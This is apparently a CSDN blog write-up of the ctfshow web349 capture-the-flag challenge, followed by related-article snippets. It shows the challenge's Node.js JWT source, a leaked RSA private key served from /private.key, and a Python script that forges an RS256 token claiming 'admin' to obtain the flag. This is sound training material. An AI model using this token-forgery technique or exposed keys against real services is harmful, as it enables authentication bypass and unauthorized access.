ctfshow web349 jwt非对称加密 源码泄露

于 2023-09-20 18:59:13 发布
阅读量81 收藏
点赞数
文章标签: 服务器 linux 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c1516175954/article/details/133093320
版权

抓包

源码

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
  
});

router.post('/',function(req,res,next){
	var flag="flag_here";
	res.type('html');
	var auth = req.cookies.auth;
	var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
	jwt.verify(auth, cert, function(err, decoded) {
	  if(decoded.user==='admin'){
	  	res.end(flag);
	  }else{
	  	res.end('you are not admin');
	  }
	});
});

 可以看到私钥加密,访问当前目录/private.key,下载私钥

-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDNioS2aSHtu6WIU88oWzpShhkb+r6QPBryJmdaR1a3ToD9sXDb
eni5WTsWVKrmzmCk7tu4iNtkmn/r9D/bFcadHGnXYqlTJItOdHZio3Bi1J2Elxg8
IEBKx9g6RggTOGXQFxSxlzLNMRzRC4d2PcA9mxjAbG1Naz58ibbtogeglQIDAQAB
AoGAE+mAc995fvt3zN45qnI0EzyUgCZpgbWg8qaPyqowl2+OhYVEJq8VtPcVB1PK
frOtnyzYsmbnwjZJgEVYTlQsum0zJBuTKoN4iDoV0Oq1Auwlcr6O0T35RGiijqAX
h7iFjNscfs/Dp/BnyKZuu60boXrcuyuZ8qXHz0exGkegjMECQQD1eP39cPhcwydM
cdEBOgkI/E/EDWmdjcwIoauczwiQEx56EjAwM88rgxUGCUF4R/hIW9JD1vlp62Qi
ST9LU4lxAkEA1lsfr9gF/9OdzAsPfuTLsl+l9zpo1jjzhXlwmHFgyCAn7gBKeWdv
ubocOClTTQ7Y4RqivomTmlNVtmcHda1XZQJAR0v0IZedW3wHPwnT1dJga261UFFA
+tUDjQJAERSE/SvAb143BtkVdCLniVBI5sGomIOq569Z0+zdsaOqsZs60QJAYqtJ
V7EReeQX8693r4pztSTQCZBKZ6mJdvwidxlhWl1q4+QgY+fYBt8DVFq5bHQUIvIW
zawYVGZdwvuD9IgY/QJAGCJbXA+Knw10B+g5tDZfVHsr6YYMY3Q24zVu4JXozWDV
x+G39IajrVKwuCPG2VezWfwfWpTeo2bDmQS0CWOPjA==
-----END RSA PRIVATE KEY-----

 写个python脚本,做jwt

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

 执行后得到伪造的jwt,然后post发包(源码里说,这样才能解密)

土木牛马勇闯天涯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
WebApi Token+ 数字签名认证源码
04-10
Web API中,通常使用非对称加密算法如RSA或ECDSA来生成和验证数字签名。 在C# WebAPI中实现Token+数字签名认证的过程大致如下: 1. **身份验证**:当用户成功登录后,服务器会生成一个Token,包含用户的标识和...
基于对称加密的简单单点登录系统sso
09-11
单点登录(Single Sign-On,简称SSO)是一种网络身份验证机制,允许用户在一个系统或应用中登录后,无需再次认证...然而,实际生产环境中,可能会选择更复杂且安全的非对称加密JWT(JSON Web Tokens)或OAuth等方案。
CTFshow刷题日记-WEB-JWT(web345-350)
Love&Share
09-22 2006
JWT JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔 Header Payload Signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } # typ:声明类型 # alg:声明加密的算法 通常直接使用 HMAC SHA256 需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的 payload示例 { "sub": "1234567890", "nam
Ctfshow web入门 JWTweb345-web350 详细题解 全
Jay17的博客
08-02 2199
Ctfshow web入门 JWTweb345-web350 详细题解 全
ctfshow JWT (Web345-350)
weixin_63231007的博客
11-08 1683
用户登录成功后,服务端生成一个随机token给用户,并且在服务端(数据库或缓存)中保存一份token,以后用户再来访问时需携带token,服务端接收到token之后,去数据库或缓存中进行校验token的是否超时、是否合法。用户登录成功后,服务端通过jwt生成一个随机token给用户(服务端无需保留token),以后用户再来访问时需携带token,服务端接收到token之后,通过jwt对token进行校验是否超时、是否合法。执行得到 构造好的JWT,放入cookie中POST发包,得到flag。
ctfshow web入门 jwt web345~web350
qq_62989306的博客
09-13 794
cookie值是base64,直接base64解密,把user改为admin,然后再base64加密,放入cookie。利用私钥生成jwt,利用公钥解密jwt,所以我们只要有私钥然后自己重新生成就可以了。访问 /private.key 得到私钥。运行下面的js代码生成jwt……
【CTFSHOW】web入门 JWT
7ruth0hn的博客
09-27 984
文章目录写在前面JWT浅析web345web346web347web348web349web350参考资料 写在前面 陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷 JWT浅析 JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下: HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方
AES加密源码 可与其他语言互通
06-04
标题中的"AES加密源码 可与其他语言互通"指出,这是一个关于AES加密技术的源代码实现,而且这个实现是跨语言的,意味着它能够与其他编程语言编写的加密代码进行交互。AES,全称Advanced Encryption Standard,是目前...
基于vue+redis+springboot+jwt+远程调用 用户登录注册权限校验的前后端源码
09-19
表示登录成功,再给前端响应数据(之前返回的是登录用户,现在使用的是token...前端使用的是:vue element admin框架,后端使用java+ Spring+ Springboot框架+ mybatisplus + jwt非对称加密token+ NoSQL技术中的redis数据库;
PHP实例开发源码—8tupian图片加密平台.zip
11-11
2. 加密算法:平台采用了某种加密技术对图片进行处理,可能是使用对称加密(如AES)或非对称加密(如RSA)。加密过程可能包括对原始图像数据进行编码,使得未授权的用户无法直接查看或使用图片。 3. 图片解密:只有...
CTFshow JWT
starttv的博客
11-24 400
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
ctfshow—jwt详解
cosmoslin的博客
09-29 2111
web345(无加密) 进入后F12,发现提示/admin 要注意使用 url 访问网页时 /admin 表示访问 admin.php 文件 /admin/ 表示访问 admin/目录下的文件,默认是 index.php 很像文件夹,所以此处应该访问 /admin/ 查看cookie eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI0OTc1MDksImV4cCI6MTYzMjUwNDcwOSwibmJmIjox
ctfshow web入门 jwt
Sentiment的博客
12-10 2411
基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数据 签证 jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
ctfshow(web入门)
qq_62553635的博客
01-15 1623
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2271
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
ctfshow学习记录-web入门(命令执行39-48)
龟速更新的九某人
06-06 837
ctfshow学习记录-web入门(命令执行web39-48)
ctfshow web入门 JWT
Anton1a的博客
02-24 4280
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
CTFshow web入门——爆破
小元砸的博客
01-24 4673
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
【CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1267
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试吧 web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
jwt非对称加密的原理
最新发布
09-13
JWT 中,使用非对称加密算法来实现签名验证。非对称加密算法使用了一对密钥,包括私钥和公钥。私钥用于生成签名,公钥用于验证签名的有效性。 下面是 JWT非对称加密原理: 1. 客户端发送请求时,服务器返回...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值